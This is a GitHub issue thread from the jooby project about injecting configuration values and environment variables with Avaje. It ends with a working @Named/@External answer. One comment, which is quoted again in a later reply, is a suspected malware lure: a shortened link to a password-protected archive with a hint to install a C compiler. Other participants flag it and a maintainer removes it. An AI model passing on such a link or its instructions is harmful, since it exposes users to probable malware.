### ISSUE TITLE
How do I inject Environment, Config, or environment variables?

### ISSUE THREAD

**Issue by jtlapp** [jooby-project/jooby#3544]
I've been unsuccessfully trying to inject configuration values into my app using Avaje.

This seems fundamental, but I haven't been able to figure out how to do it.

I was hoping that Environment or Config would be available for injection by default.

I'd settle for simply injecting environment variables.

**Comment by SagarChandra07** [comment]
try this
https://bit.ly/47P0Nvo
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by SentryMan** [comment]
This seems fundamental, but I haven't been able to figure out how to do it.

Given application.conf:
```
 test.value=true 
 test.value2=amogus
```

You can do 

```java
@Singleton
record Something(@External @Named("test.value") String value, @Named("test.value2") String value2) {}
```
You only need to add `@External` the one time and then avaje knows strings are coming from jooby. 

> try this
https://bit.ly/47P0Nvo
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

What is this

**Comment by jtlapp** [comment]
Perfect! That works for environment variable names too. Thank you so much!

Dang. The docs even say as much, and I missed it: "Configuration properties can be injected using the @Named annotation".

It might be wise to delete that link. It could be an attempt to spread malware.

**Comment by jknack** [comment]
@jtlapp @SentryMan I deleted malware content + reported/blocked
